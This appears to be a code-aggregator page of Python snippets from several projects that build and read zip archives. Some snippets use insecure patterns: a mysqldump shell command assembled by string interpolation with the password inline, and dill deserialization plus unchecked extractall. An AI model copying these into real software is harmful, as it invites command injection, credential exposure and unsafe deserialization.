        # Raw docstring: "\*" is not a valid escape in a normal string.
        # The context manager closes the archive even if a check below raises.
        with zipfile.ZipFile(path, 'w', zipfile.ZIP_DEFLATED) as zf:
            for dirpath, dirnames, filenames in os.walk(self.path):
                # path of this directory below self.path ('' for the root)
                relative_path = dirpath[len(self.path) + 1:]
                if relative_path and not self._ignore(relative_path):
                    zf.write(dirpath, relative_path)
                for name in filenames:
                    archive_name = os.path.join(relative_path, name)
                    if self._ignore(archive_name):
                        continue
                    real_path = os.path.join(dirpath, name)
                    self._check_type(real_path)
                    if os.path.islink(real_path):
                        # symlinks are stored as links to their target
                        self._check_link(real_path)
                        self._write_symlink(
                            zf, os.readlink(real_path), archive_name)
                    else:
                        zf.write(real_path, archive_name)
        return path
项目:distributional_perspective_on_RL    作者:Kiwoo    | 项目源码 | 文件源码
def load(path, num_cpu=16):
        """Restore a saved act function from ``path``.

        The file holds a dill-serialized pair ``(model_data, act_params)``;
        ``model_data`` is the bytes of a zip archive containing the model
        state.  The archive is unpacked into a temporary directory and the
        state is loaded from its ``model`` entry.

        :param path: file to load.
        :param num_cpu: passed to ``U.make_session``.
        :return: an ``ActWrapper`` around the rebuilt act function.
        """
        with open(path, "rb") as f:
            model_data, act_params = dill.load(f)
        act = deepq.build_act(**act_params)
        sess = U.make_session(num_cpu=num_cpu)
        # the session is entered here and not exited by this function
        sess.__enter__()
        with tempfile.TemporaryDirectory() as td:
            arc_path = os.path.join(td, "packed.zip")
            with open(arc_path, "wb") as f:
                f.write(model_data)

            # close the archive handle instead of leaving it to the GC
            with zipfile.ZipFile(arc_path, 'r', zipfile.ZIP_DEFLATED) as packed:
                packed.extractall(td)
            U.load_state(os.path.join(td, "model"))

        return ActWrapper(act, act_params)
项目:distributional_perspective_on_RL    作者:Kiwoo    | 项目源码 | 文件源码
def relatively_safe_pickle_dump(obj, path, compression=False):
    """This is just like regular pickle dump, except that the failure cases
    are different:

        - It's never possible that we end up with a pickle in corrupted state.
        - If there was a different file at the path, that file will remain
          unchanged in the event of failure (provided that filesystem rename
          is atomic).
        - It is sometimes possible that we end up with a useless temp file
          which needs to be deleted manually (it will be removed automatically
          on the next function call).

    The intended use case is periodic checkpoints of experiment state, such
    that we never corrupt previous checkpoints if the current one fails.

    Parameters
    ----------
    obj: object
        object to pickle
    path: str
        path to the output file
    compression: bool
        if true the pickle is stored as member "data" of a zip archive
    """
    temp_storage = path + ".relatively_safe"
    if compression:
        # Using gzip here would be simpler, but the size is limited to 2GB
        with tempfile.NamedTemporaryFile() as uncompressed_file:
            pickle.dump(obj, uncompressed_file)
            # The zip step re-reads the file by name, so buffered bytes must
            # reach the disk first; otherwise the archive holds truncated data.
            uncompressed_file.flush()
            with zipfile.ZipFile(temp_storage, "w", compression=zipfile.ZIP_DEFLATED) as myzip:
                myzip.write(uncompressed_file.name, "data")
    else:
        with open(temp_storage, "wb") as f:
            pickle.dump(obj, f)
    os.rename(temp_storage, path)
项目:BackManager    作者:linuxyan    | 项目源码 | 文件源码
def backup_mysql():
    """Dump the configured database, zip the dump and tag it with its MD5.

    The dump is written to ``backup_dir`` under the database name plus a
    timestamp, zipped to ``<dump>.zip`` and renamed to ``<dump>.zip_<md5>``;
    the plain dump is then removed.

    Returns a dict with ``status`` 'back_success' plus ``file_path`` and
    ``md5`` on success, or ``status`` 'back_failed' when the dump command
    exits non-zero or any exception occurs.
    """
    try:
        back_file_name = database_name+time.strftime("%Y%m%d_%H%M%S", time.localtime())
        back_file_path = os.path.join(backup_dir,back_file_name)
        # NOTE(security): the command is assembled by string interpolation
        # and run through the shell, with the password on the command line.
        backup_command= '%s -h%s -P%d -u%s  -p%s --default-character-set=utf8 %s  > %s'\
                        %(mysql_dump,mysql_host,int(mysql_port),mysql_user,mysql_pass,database_name,back_file_path)
        if os.system(backup_command) != 0:
            return {'status':'back_failed'}

        zip_file_path = back_file_path+'.zip'
        # the context manager closes the archive even if the write fails
        with zipfile.ZipFile(zip_file_path, 'w', zipfile.ZIP_DEFLATED, allowZip64=True) as f:
            f.write(back_file_path,back_file_name)
        md5_num = str(md5sum(zip_file_path))
        md5_file_path = zip_file_path+'_'+md5_num
        # NOTE(review): md5_file_path already starts with backup_dir -- confirm
        # the join is meant to be a no-op for absolute backup_dir values.
        back_file_new_path = os.path.join(backup_dir,md5_file_path)
        os.rename(zip_file_path,back_file_new_path)
        os.remove(back_file_path)
        return {'status':'back_success','file_path':back_file_new_path,'md5':md5_num}
    except Exception as e:
        # best effort: report the error and signal failure to the caller
        print(e)
        return {'status':'back_failed'}
项目:aws-greengrass-mini-fulfillment    作者:awslabs    | 项目源码 | 文件源码
def refresh_lambda_zip(lambda_files, lambda_dir):
    """Rebuild the deployment archive from the given Lambda source files.

    The archive at ``temp_deploy_zip`` is opened in write mode (replacing any
    previous content). Each entry of ``lambda_files`` is read from
    ``lambda_dir`` and stored under its base name only, so any sub-directory
    part of the entry is dropped inside the archive.
    """
    deploy_zip = zipfile.ZipFile(temp_deploy_zip, "w", zipfile.ZIP_DEFLATED)
    with deploy_zip:
        for rel_name in lambda_files:
            source_path = lambda_dir + '/' + rel_name
            member_name = basename(rel_name)
            deploy_zip.write(source_path, member_name)
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def archive(self, build_dir):
        """Zip ``self.source_dir`` into ``<name>-<installed_version>.zip`` in *build_dir*.

        If the target file already exists the user is asked (through
        ``ask_path_exists``) whether to (i)gnore, (w)ipe or (b)ackup it:
        'i' skips archive creation, 'w' deletes the existing file, and 'b'
        moves it to the path returned by ``backup_dir``.

        Inside the archive every member is stored under ``self.name + '/'``.
        Directories get explicit entries with 0o755 permissions;
        ``pip-egg-info`` directories are pruned from the walk and files named
        ``PIP_DELETE_MARKER_FILENAME`` are skipped.
        """
        assert self.source_dir
        create_archive = True
        archive_name = '%s-%s.zip' % (self.name, self.installed_version)
        archive_path = os.path.join(build_dir, archive_name)
        if os.path.exists(archive_path):
            response = ask_path_exists(
                'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
                display_path(archive_path), ('i', 'w', 'b'))
            if response == 'i':
                create_archive = False
            elif response == 'w':
                logger.warn('Deleting %s' % display_path(archive_path))
                os.remove(archive_path)
            elif response == 'b':
                dest_file = backup_dir(archive_path)
                logger.warn('Backing up %s to %s'
                            % (display_path(archive_path), display_path(dest_file)))
                shutil.move(archive_path, dest_file)
        if create_archive:
            source_root = os.path.normcase(os.path.abspath(self.source_dir))
            # The context manager closes the archive even when the walk or a
            # write fails part-way through.
            with zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED) as archive_zip:
                for dirpath, dirnames, filenames in os.walk(source_root):
                    # Removing the entry in place stops os.walk from descending
                    # into it.
                    if 'pip-egg-info' in dirnames:
                        dirnames.remove('pip-egg-info')
                    for dirname in dirnames:
                        dir_path = os.path.join(dirpath, dirname)
                        name = self._clean_zip_name(dir_path, source_root)
                        dir_info = zipfile.ZipInfo(self.name + '/' + name + '/')
                        dir_info.external_attr = 0x1ED << 16  # 0o755
                        archive_zip.writestr(dir_info, '')
                    for filename in filenames:
                        if filename == PIP_DELETE_MARKER_FILENAME:
                            continue
                        file_path = os.path.join(dirpath, filename)
                        name = self._clean_zip_name(file_path, source_root)
                        archive_zip.write(file_path, self.name + '/' + name)
            # NOTE(review): no matching `logger.indent += 2` is visible in this
            # method; kept as in the original - confirm against the caller.
            logger.indent -= 2
            logger.notify('Saved %s' % display_path(archive_path))
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=None,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.

    The archive is written to 'zip_filename' (its parent directory is created
    first via ``mkpath``). Every regular file found below 'base_dir' is stored
    under its path relative to 'base_dir'.

    Parameters:
        zip_filename: path of the archive to create.
        base_dir: directory whose files are added.
        verbose: accepted for interface compatibility; not used here.
        dry_run: when true, nothing is written; files are only logged.
        compress: true for deflate, false for stored; ``None`` selects deflate
            on Python 2.4 and later.
        mode: mode passed to ``zipfile.ZipFile`` ('w' by default).

    Returns the name of the output zip file.
    """
    import zipfile
    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                # relpath stays correct when base_dir is '.', ends with a
                # separator or is not normalized; slicing by len(base_dir)
                # does not.
                p = os.path.relpath(path, base_dir)
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'" % p)

    if compress is None:
        # avoid 2.3 zipimport bug when 64 bits; compare the version tuple
        # rather than the version string.
        compress = sys.version_info >= (2, 4)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        # Context manager: the archive is closed even if a write fails.
        with zipfile.ZipFile(zip_filename, mode, compression=compression) as z:
            for dirname, dirs, files in os.walk(base_dir):
                visit(z, dirname, files)
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
#
项目:pip-update-requirements    作者:alanhamlett    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        """Write the listed files into a new deflate-compressed zip at *pathname*.

        ``archive_paths`` yields ``(archive_name, source_path)`` pairs; each
        source file is stored under its archive name, and a debug line is
        logged for every pair.
        """
        wheel_zip = ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED)
        with wheel_zip:
            for arcname, source in archive_paths:
                logger.debug('Wrote %s to %s in wheel', source, arcname)
                wheel_zip.write(source, arcname)
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def GetZipWith(fname, content):
    """Return the raw bytes of an in-memory zip archive holding one member.

    Parameters:
        fname: name of the member inside the archive.
        content: data stored for that member.

    Returns:
        The complete archive as a byte string.
    """
    # Local import keeps the block self-contained; io.BytesIO exists on both
    # Python 2.6+ and Python 3, unlike the Python-2-only StringIO module.
    import io

    fp = io.BytesIO()
    # Fourth positional argument is allowZip64=False, as in the original call.
    with zipfile.ZipFile(fp, "a", zipfile.ZIP_DEFLATED, False) as zf:
        zf.writestr(fname, content)
    # The archive is finalized when the with-block exits, so the buffer now
    # holds a complete zip file.
    return fp.getvalue()
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def save_files_in_zip():
    """Move the files listed in CREATED_FILES into ``SCHEMA_DIR + '.zip'``.

    When CREATED_FILES is empty a notice is emitted through ``output_line``
    and nothing else happens. Otherwise each file name is encoded with
    OUT_FILE_ENCODING, added to a new deflate-compressed archive, and deleted
    from disk; ``clean_up()`` is called at the end.
    """
    if not CREATED_FILES:
        output_line('-- nothing to zip')
        return

    zip_name = SCHEMA_DIR + '.zip'
    output_line('creating zip %s ...' % (zip_name))
    stored = []
    # Context manager: the archive is closed even if a write fails.
    with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zip_f:
        for fn in CREATED_FILES:
            fne = fn.encode(OUT_FILE_ENCODING)
            zip_f.write(fne)
            stored.append(fne)
    # Delete the sources only once the archive has been finalized, so a
    # failure while zipping cannot lose files that exist nowhere else.
    for fne in stored:
        os.remove(fne)
    clean_up()
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def archive_dir(source, arcname, target, arc_time):
    """Zip every file below *source* into ``<target>/<arc_time>_<arcname>.zip``.

    Directories are visited breadth-first. A file is skipped when its
    lower-cased name equals the lower-cased archive file name (so the archive
    does not add itself) or starts with ``ini``. A directory that raises while
    being processed is abandoned and the walk continues with the next one.

    Parameters:
        source: root directory to back up.
        arcname: base name of the archive (without time prefix / extension).
        target: directory in which the archive is created.
        arc_time: value prefixed (via ``str``) to the archive name.

    Returns:
        ``1`` on success, otherwise the exception instance that aborted the
        backup. Failure to open the archive itself is raised to the caller.
    """
    from collections import deque  # O(1) pops from the left of the queue

    # Set the filename and destination.
    arcname = str(arc_time) + '_' + arcname + '.zip'  # Archive filename
    target = str(target + '/' + arcname)              # Path to storage...
    # Compare lower-case to lower-case; the original compared a lower-cased
    # file name with the unmodified archive name.
    skip_name = arcname.lower()

    pending = deque([str(source)])  # Directories still to be listed.
    zipObj = zipfile.ZipFile(target, 'w', zipfile.ZIP_DEFLATED)

    try:
        # Closes the archive on success and on failure alike.
        with zipObj:
            while pending:
                current = pending.popleft()
                try:
                    for item in os.listdir(current + '/'):
                        full_path = current + '/' + item
                        if os.path.isdir(full_path):
                            # Collect sub dirs for a later pass.
                            pending.append(full_path)
                        elif os.path.isfile(full_path):
                            lowered = item.lower()
                            # Ignore the archive file if in the dir structure.
                            if lowered == skip_name:
                                continue
                            # Task directory filter.
                            if lowered[:3] == 'ini':
                                continue
                            zipObj.write(str(full_path))
                except Exception:
                    # Best effort: ignore non-accessible directories, but let
                    # KeyboardInterrupt / SystemExit propagate.
                    pass
        return 1  # Success...

    except Exception as error:
        return error  # Backup failed...

#//////////////////////////////////////////////////////>
# CONFIGURATION AND PATH SETUPS
#//////////////////////////////////////////////////////>

# SPECIFY SOURCE PATHS; add as many as you like.
# Don't forget to add these to the SOURCE_PATH list below.
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def append(self, pathAndFileName):
        """Add a file, or every file below a directory, to the in-memory zip.

        ``self.inMemory`` is opened as a zip archive in append mode. When
        *pathAndFileName* is a regular file it is added directly; otherwise it
        is walked recursively and every file found is added. Members are
        stored under the path they were read from.
        """
        # The with-block closes the ZipFile, which writes the central
        # directory into the buffer; the original never closed it explicitly.
        with zipfile.ZipFile(self.inMemory, "a", zipfile.ZIP_DEFLATED, False) as zf:
            if os.path.isfile(pathAndFileName):
                zf.write(pathAndFileName)
            else:
                for root, folders, files in os.walk(pathAndFileName):
                    for file_name in files:
                        zf.write(os.path.join(root, file_name))
项目:TACTIC-Handler    作者:listyque    | 项目源码 | 文件源码
def create_update_archive(archive_path):
    """Write the application update files into a new zip at *archive_path*.

    The file list comes from ``create_app_update_list()``. Each file is stored
    under its path with every occurrence of ``env_mode.get_current_path()``
    removed.
    """
    # The archive is opened before the file list is built, as in the original;
    # the context manager closes it even if a later step raises.
    with zipfile.ZipFile(archive_path, 'w', compression=zipfile.ZIP_DEFLATED) as zp:
        files_list = create_app_update_list()
        abs_path = env_mode.get_current_path()

        for fl in files_list:
            zp.write(fl, arcname=fl.replace(abs_path, ''))
项目:FRG-Crowdsourcing    作者:97amarnathk    | 项目源码 | 文件源码
def _zip_factory(self, filename):
        """Open *filename* as a new, writable ZipFile with Zip64 enabled.

        Deflate compression is used when ``zlib`` can be imported; otherwise
        members are stored uncompressed. The caller owns the returned archive
        and is responsible for closing it.
        """
        try:
            import zlib
            assert zlib
        except Exception:
            # zlib is unavailable: fall back to plain storage.
            method = zipfile.ZIP_STORED
        else:
            method = zipfile.ZIP_DEFLATED
        return zipfile.ZipFile(file=filename, mode='w', compression=method, allowZip64=True)
项目:swjtu-pyscraper    作者:Desgard    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        """Create a deflate-compressed zip at *pathname* from the given pairs.

        Each element of ``archive_paths`` is ``(name_in_archive, file_on_disk)``.
        For every pair a debug message is logged and the file is then stored
        under the given archive name.
        """
        target = ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED)
        with target:
            for member_name, disk_path in archive_paths:
                logger.debug('Wrote %s to %s in wheel', disk_path, member_name)
                target.write(disk_path, member_name)
项目:swjtu-pyscraper    作者:Desgard    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.

    The archive is written to 'zip_filename'; its parent directory is created
    first via ``mkpath``. Every regular file found below 'base_dir' is stored
    under its path relative to 'base_dir'.

    Parameters:
        zip_filename: path of the archive to create.
        base_dir: directory whose files are added.
        verbose: accepted for interface compatibility; not used here.
        dry_run: when true, nothing is written; files are only logged.
        compress: true for deflate (default), false for stored.
        mode: mode passed to ``zipfile.ZipFile`` ('w' by default).

    Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                # relpath stays correct when base_dir is '.', ends with a
                # separator or is not normalized; slicing by len(base_dir)
                # does not.
                p = os.path.relpath(path, base_dir)
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        # Context manager: the archive is closed even if a write fails.
        with zipfile.ZipFile(zip_filename, mode, compression=compression) as z:
            for dirname, dirs, files in os.walk(base_dir):
                visit(z, dirname, files)
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def build_zip(self, pathname, archive_paths):
        """Store each listed file in a fresh deflate-compressed zip at *pathname*.

        ``archive_paths`` provides ``(archive_name, source_path)`` tuples. A
        debug message is logged for each tuple before the source file is added
        under its archive name.
        """
        out_zip = ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED)
        with out_zip:
            for entry in archive_paths:
                stored_as, read_from = entry
                logger.debug('Wrote %s to %s in wheel', read_from, stored_as)
                out_zip.write(read_from, stored_as)
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def make_wheelfile_inner(base_name, base_dir='.'):
    """Create a whl file from all the files under 'base_dir'.

    The archive is written to ``base_name + ".whl"``. Files are stored under
    their normalized path as produced by walking 'base_dir'. Files inside a
    directory whose name ends with ``.dist-info`` are written last, ordered so
    that WHEEL, METADATA and RECORD come at the very end (in that order).

    Returns the name of the created file.
    """

    zip_filename = base_name + ".whl"

    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    # Sort rank for .dist-info members; unknown names rank 0 (written first).
    score = {'WHEEL': 1, 'METADATA': 2, 'RECORD': 3}
    deferred = []

    # ZipFile does not close a file object that was passed in, so the
    # underlying file gets its own context manager.
    # XXX support bz2, xz when available
    with open(zip_filename, "wb+") as fileobj:
        with zipfile.ZipFile(fileobj, "w",
                             compression=zipfile.ZIP_DEFLATED) as zf:

            def writefile(path):
                zf.write(path, path)
                log.info("adding '%s'" % path)

            for dirpath, dirnames, filenames in os.walk(base_dir):
                for name in filenames:
                    path = os.path.normpath(os.path.join(dirpath, name))

                    if os.path.isfile(path):
                        if dirpath.endswith('.dist-info'):
                            deferred.append((score.get(name, 0), path))
                        else:
                            writefile(path)

            deferred.sort()
            # Distinct loop name so the `score` table is not rebound.
            for _rank, path in deferred:
                writefile(path)

    return zip_filename
项目:noc-orchestrator    作者:DirceuSilvaLabs    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.

    The archive is written to 'zip_filename'; its parent directory is created
    first via ``mkpath``. Every regular file found below 'base_dir' is stored
    under its path relative to 'base_dir'.

    Parameters:
        zip_filename: path of the archive to create.
        base_dir: directory whose files are added.
        verbose: accepted for interface compatibility; not used here.
        dry_run: when true, nothing is written; files are only logged.
        compress: true for deflate (default), false for stored.
        mode: mode passed to ``zipfile.ZipFile`` ('w' by default).

    Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                # relpath stays correct when base_dir is '.', ends with a
                # separator or is not normalized; slicing by len(base_dir)
                # does not.
                p = os.path.relpath(path, base_dir)
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'" % p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        # Context manager: the archive is closed even if a write fails.
        with zipfile.ZipFile(zip_filename, mode, compression=compression) as z:
            for dirname, dirs, files in os.walk(base_dir):
                visit(z, dirname, files)
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename